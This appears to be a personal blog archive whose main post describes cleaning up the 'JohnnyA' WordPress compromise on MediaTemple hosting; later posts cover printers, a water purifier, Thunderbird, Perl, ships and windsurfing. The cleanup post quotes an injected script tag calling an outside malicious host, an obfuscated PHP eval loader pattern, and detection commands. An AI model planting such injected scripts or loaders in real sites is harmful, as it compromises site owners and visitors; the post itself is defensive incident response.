JohnnyA Hack on MediaTemple grid server

Posted on August 7, 2010 by Wick

Noticed malware warning messages thanks to Google Safe Browsing, when viewing several of my websites hosted on MediaTemple’s Grid Server (gs) account.

Did some searching & found it’s a widespread attack on MediaTemple. MediaTemple lets (gs) customers host up to 100 domains under one account for the low-low price of $20/month … pretty great, until you have to figure out the path of entry for a hacker.

Although thankfully so far it’s not actually destructive, the “JohnnyA” hack is a mess (like any good hack!):

  • Javascript files had malicious obfuscated code inserted at the top of the compromised files. For my site the hackers targeted the jQuery library, jQuery plugins (corner, impromptu, etc), & swfobject.js that came bundled in the cu3er WordPress theme.
  • PHP files of 5298 bytes were spread all throughout the site structure, named for Unix functions: chmod.php, closedir.php, content.php, eregi.php, fclose.php, fopen.php, fwrite.php, is_file.php, is_writable.php …. all were located under html/ (not cgi-bin/) so they were especially easy to locate & delete.
  • WordPress default theme index.php & footer.php (someone else mentioned their header.php was also compromised) had malicious Javascript code added.
  • WordPress posts had malicious code added to the top:
    <h5><script src="http://maroon.karenegren.com/js/jquery.min.js"></script></h5>
  • WordPress databases had “johnnyA” & “WordPress” admin users added to the wp_users table, as well as entries under wp_metauser with what looks like some sort of evil admin interface HTML/Javascript code. Here is my hacked WP users table: 
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email                | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
| 14 | johnnyA    | $P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/ | John          | sarkonerr@gmail.com       |          | 0000-00-00 00:00:00 |                     |           0 | John         |
| 12 | WordPress  | 3e04a6d10c88e6f5818a2a4151f9a95c   | WordPress     | www@www.com               | www.com  | 0000-00-00 00:00:00 |                     |           0 | WordPress    |
|  1 | admin      | [censored]                         | admin         | [censored]                | http://  | 2006-10-23 13:24:13 |                     |           0 | netscraps    |
+----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+

Cleanup took awhile — see below. I also changed my MediaTemple AccountCenter password, my user (SSH/SFTP) account passwords, database passwords, moved all my WordPress installations off to a new, completely separate (not linked in AccountCenter) MediaTemple grid server account, & signed up for Sucuri’s website malware monitoring service …. because of all the recent hack problems, MediaTemple customers receive a discount. Great. Here’s hoping it catches any hacks before Google Safe Browsing does.

The posts below have a lot of information on various ways to scan for the compromised files but so far I haven’t seen anything definitive in terms of how to prevent this all from happening again. Definitely read the posted comments too:

Here are the steps I took to remove the exploits:

Find compromised Javascript files:

  • find . -name "*.js" -exec grep -l "gr0=0" {} \;
  • find . -name "*.js" -exec grep -l "this.n=3279;this.O=58441;" {} \;

… Both searches returned the same results for me. The evil Javascript was the top line of each file, very long mostly obfuscated code ending with var gr0=0; The evil top line didn’t have its own newline character at the end, so be careful not to remove the ENTIRE top line without checking first that you’re not removing legitimate code way at the end of the line.

Find evil PHP files:

  • grep -iR --include "*.php" "[a-zA-Z0-9\/\+]\{255,\}" *
    This search may show false positives. Look for matches that look like:
    <?php $o = '[random characters here];eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B"); ?>
  • Another way to check is:
    find . -name "*.php" -ctime 14
    …which shows a list of .php files where the timestamp is within the last 14 days.
  • If the file is 5298 bytes, chances are the entire file is junk & you can delete it.
  • Otherwise if the file is something that was pre-existing (like WordPress theme header.php, index.php etc) you’ll have to edit it & remove the bad code by hand or better yet, replace the entire compromised file with a clean version from a backup or original distribution.

Find evil WordPress users:

  • You’ll need mySQL access to your WordPress database for this. You are on your own there.
  • use dbxxxxxx_wp; (whatever your WordPress database is named)
  • select * from wp_users; (note the id for all users you don’t recognize)
  • delete from wp_users where id = 'xx'; (replace xx with the id, & remember each one you delete)
  • delete from wp_usermeta where user_id = 'xx' (do this once for each userid you deleted above)

Find evil WordPress posts:

  • select post_content from wp_posts where post_content like '%<h5><script%';
  • update wp_posts set post_content = replace( post_content, "<h5>script here</h5>", ""); …run this once for each unique script found above, replacing “script here” with the actual script tag.
Posted in bugs, MediaTemple, mysql | 1 Comment

Scanning legal-size documents with the Canon MX860 ADF is needlessly complicated

Posted on July 25, 2010 by Wick
Canon MX860: how to scan legal-size documents

Pound the Canon MX860 repeatedly with a gavel.

You’d think in this day & age of all-in-one printers, you could put a legal-size document in the document feeder (ADF) & scan away. Not so with the Canon MX860.

Out of the box, the MX860′s ADF will scan legal-size documents as a letter-size PDF with the bottom 3 inches cut off. Document length auto-detection with the ADF was apparently too complex for Canon engineers (?!)

Technically the MX860 can scan legal-size paper, but it’s a trick (“trick” meaning pain in the ass) if you typically use the handy buttons on the scanner for everything. Here’s how:

Load up the MX860′s desktop scanning software, which Canon cryptically called “MP Navigator EX” — mine opens up to a wizard-style screen. Select “Stack Of Documents (ADF)”, the click the “Specify…” button on the left-hand side & there you can temporarily change the PDF document size for the next ADF scan.

If you scan legal documents all the time & want to change the settings permanently: Click the “Preferences” button (top/right corner) & switch to the “Scanner Button Settings” tab. Then you can change the document settings for each one-click action. So for instance you could set the “Save to PC” action to scan a legal-size PDF & “Save to PDF” to scan in letter size.

Sounds needlessly complicated? It is, absolutely. Hopefully Canon will add automatic document length detection for the ADF in a future firmware/software update, but I wouldn’t count on it.

(Anyone know if this is fixed with the Canon MX870?)

Posted in bugs, tips | 2 Comments

Raising The Cheonan

Posted on April 30, 2010 by Wick

Salvaging the South Korean corvette “Cheonan” is old news now that the US has a major ecological disaster to contend with, but these AP photos of the bow section being raised are pretty amazing. It’s hard to believe a world that has the technology to grab a sunken battleship off the seafloor after a few days can’t plug an itty bitty mile-deep runaway oil well any faster.

Posted in Machines Of Unusual Size, nautical disasters, photos | Leave a comment

Continuous Beeping from a Trojan UV Max C4

Posted on April 30, 2010 by Wick

Continuous beeping from my Trojan UV Max C4Our Trojan UVMax C4 water purifier started beeping continuously. The install date was April 2009, so it’s been a year — according to the manual, time to replace the UV bulb!

I dutifully ordered a new UV lamp ($90) & installed it. Wiping my hands in smug homeowner anticipation of what was sure to be the return of super clean water for my family, I plugged the C4 power supply back in… green lights all around… but the beeping didn’t stop.

I unplugged the unit, waited a bit, plugged it back in… more beeping. Pulled out the manual. The only mention of the beeping alarm is in the troubleshooting section, which refers you back to the Control Panel section, which has all kinds of useful information about the status lights but absolutely nothing about a beeping alarm.

The manual says there’s supposed to be a model-specific reference card stuck behind the power supply. Sure enough I could see the tab sticking up — I felt a wave of relief, as surely the reference card would have an answer to The Meaning Of The Incessant Beep.

Nope. No mention of an audible alarm whatsoever.

By now I could feel a beeping-induced headache. Putting my hope in the Internet for a solution, I ran upstairs to the computer. Sure enough, the top result had the answer (thanks, Google) — but it wasn’t from the Trojan UVMax website — a random reseller had taken the time to post the answer … Apparently TrojanUV produced defective C4 power supply units between January 2009 – January 2010. Yep, a whole year of defective units. But although they’re now four months into people discovering the problem, there’s nothing about it on their website. No notice, no press release, nothing (or am I just not seeing it?)

The solution is to contact Trojan for a replacement power supply. In the meantime, I’m stuck with choosing between unsafe drinking water or constant beeping.

So in review:

  1. There is nothing the Trojan UV Max manual about what the beeping alarm means,
  2. There is no way to silence the beeping alarm,
  3. The Trojan UV website lacks any information about this year-long manufacturing defect.

Just to make life a little harder, the email link on the Trojan UV Max support website (Viqua) goes nowhere.

I called their customer service line & the rep I spoke with knew about the C4 problem right away. Apparently they had mistakenly installed firmware for the “Plus” version — which have a reset button to silence the alarm — into the “regular” C4 units, which don’t.

I asked the rep if the replacement C4 power supply was shipping via overnight express. He mumbled something to the effect that I should have it “within a day or two”. However it’s been 3 days & I still don’t have the replacement Trojan UV Max C4 power supply, so it’s becoming clear that Trojan doesn’t care enough to ship these via overnight or 2-day mail.

By now I’ve lost count how many ways Trojan UV customer service has completely failed their customers.

UPDATE (1/21/11): Still no note about this defect on their website. Even a simple note on their Support page, like “C4 Beeping? Click here to contact tech support” would be far more helpful to their customers than nothing at all. However in the 8 months since I originally posted this, Viqua has fixed their website contact links so they actually work, so that’s one step in the right direction! Seems that people have had better success by calling Viqua though.

Posted in awful customer service, bugs, tips | 22 Comments

Thunderbird ignores Windows’ default printer setting

Posted on January 13, 2010 by Wick

I bought a new printer, a Canon MX860. As all-in-one printers go, it’s fantastic. Soon it was knighted as my new Windows’ default printer.

Everything was happy in Printerland until I tried to print an email from Thunderbird. Thunderbird kept selecting my old printer — I had left the old printer driver installed — and each time I had to change the printer back to my new Canon. Granted, that’s a pretty minor annoyance, but let enough minor annoyances pass you by & soon they get together & storm the castle.

Turns out Thunderbird stores its own default printer setting & if it’s set, the Windows default printer gets completely ignored. Worse, Thunderbird’s default printer setting is about as hidden as it gets:

  1. Tools menu -> Options -> Advanced -> General tab -> Config Editor button
  2. filter the list by typing “printer” in the Filter box (top of the screen)
  3. find the “print.print_printer” setting (who names these settings, anyway?)
  4. right-click & click “Reset”.

That does the trick!

Posted in bugs, tips | Tagged , , , | 18 Comments

Prototype mismatch: sub main::head ($) vs none

Posted on July 9, 2009 by Wick

Turns out that when you use the LWP::Simple & CGI modules together in a Perl script, each has a conflicting head() function that throws that error. Who knew? Everyone who took the time to read the CAVEAT note at the end of the LWP::Simple docs, apparently:

Note that if you are using both LWP::Simple and the very popular CGI.pm module, you may be importing a head function from each module, producing a warning like “Prototype mismatch: sub main::head ($) vs none”. Get around this problem by just not importing LWP::Simple’s head function, like so:

use LWP::Simple qw(!head);
use CGI qw(:standard);  # then only CGI.pm defines a head()

Then if you do need LWP::Simple’s head function, you can just call it as LWP::Simple::head($url).

Posted in bugs, perl | Leave a comment

The Cougar Ace tips over, Alaska

Posted on May 28, 2009 by Wick

The Cougar Ace is well-known for setting a Canadian record for most vehicles unloaded from a single ship, and also for a shipping disaster that once again caught my attention primarily because of the amazing Coast Guard photos. Like the Selendang Ayu disaster, the Cougar Ace became disabled off the Aleutian Islands, Alaska — this time though, the problem was an 60 degree list due to a ballast handling mistake. Wired has a pretty amazing writeup about the salvage operation. Click photos for the full-size versions.

MV Cougar Ace
Aug. 8, 2006: towed to safer waters in Wide Bay, Aleutian Islands

MV Cougar Ace
Aug. 10, 2006: still waiting to be righted, Wide Bay, Aleutian Islands

Posted in nautical disasters | Leave a comment

Resize script in Paint Shop Pro X2

Posted on May 28, 2009 by Wick

PSP X2 resize scriptI batch-process-resized some photos in PSP X2, & realized too late (after I had emailed 90 photos off to various relatives) that everyone appeared a little taller & thinner than they normally are. Not so bad right? Except that headshots look a little weird. The photos were taken with different cameras with slightly different aspect ratios.

So here’s an easy way to batch process/resize photos with a PSP X2 script, each to their correct aspect ratio (fixed width, variable height):

  • Open any one image.
  • File, Script, Start recording … resize the image.
  • File, Script, Save recording … save it under your scripts folder, which is generally Documents/My PSP Files/Scripts-Restricted/
  • File, Script, Edit.. browse to your scripts folder & select the resize script that you just saved.
  • click the Text Editor button
  • delete or comment out (# in front of the line) the ‘Height’ AND ‘AspectRatio’ lines. Setting them both to None works too. Make sure ‘MaintainAspectRatio’ is set to True.
  • Save & enjoy not looking warped.
Posted in graphics, paint shop pro, tips | Leave a comment

The birth of an island near Tonga

Posted on January 3, 2007 by Wick

the birth of an island

The yacht Maiken witnessed the birth of a new island near Tonga. Some pretty amazing photos, a sea of floating stone & the volcanic island rising up out of the water.

Posted in world | 1 Comment

Windsurfing, late fall in Vermont

Posted on October 28, 2006 by Wick

Wick windsurfing jumpNormally the National Weather Service tends to downgrade the weekend wind forecast the closer it gets to Friday afternoon.

Not so in the late fall — the forecasts just keep get better & better, or for all the non-windsurfers, worse & worse! Also you would think the local NWS office would just give up on the Ultraviolet Index after mid-October. It’s nice of them to clarify which category a “1″ rating is in.

.THE LAKE CHAMPLAIN OPEN WATERS FORECAST…

…A LAKE WIND ADVISORY TODAY AND TONIGHT…

.TODAY…SOUTHEAST WINDS 25 TO 35 KNOTS WITH GUSTS TO 45 KNOTS POSSIBLE. WAVES 3 TO 5 FEET AND LOCALLY HIGHER. RAIN…HEAVY AT TIMES….BRIEFLY MIXED WITH SLEET OR SNOW AT THE ONSET. VISIBILITY 1 TO 3 MILES IN PRECIPITATION.
.TONIGHT…SOUTHWEST WINDS 15 TO 30 KNOTS. WAVES 2 TO 3 FEET. OCCASIONAL RAIN. VISIBILITY REDUCED TO 3 TO 5 MILES AT TIMES.
.SUNDAY…SOUTHWEST TO WEST WINDS 25 TO 35 KNOTS WITH HIGHER GUSTS POSSIBLE. WAVES 3 TO 4 FEET. SCATTERED RAIN SHOWERS. VISIBILITY REDUCED TO 2 TO 4 MILES AT TIMES.

THE LAKE CHAMPLAIN LAKE LEVEL AT THE KING STREET FERRY DOCK IN BURLINGTON WAS 96.80 FEET…AND THE WATER TEMPERATURE WAS 49 DEGREES.

THE ULTRAVIOLET INDEX FOR SATURDAY OCTOBER 28 IS A 1. THIS IS IN THE LOW CATEGORY.

SATURDAY UPDATE: Usually when the NWS forecasts wind 25-35 knots “with gusts to 45 knots”, they’re not this wrong:

White's Beach wind graph

So .. far less wind than forecast in the morning .. followed by a quick 90-degree switch & even lighter breeze in the afternoon .. then another quick 180-degree switch. Finally the promised wind shows up, well after sunset.

West Dennis wind graph West Dennis beach (Cape Cod) had a much better day.. consistent 35-40 mph with a very gradual direction shift from SSE to SSW. This typifies the difference between coastal & Lake Champlain surfing conditions.

Vermont keeps everyone guessing, professional forecasters included.

Posted in windsurfing | Leave a comment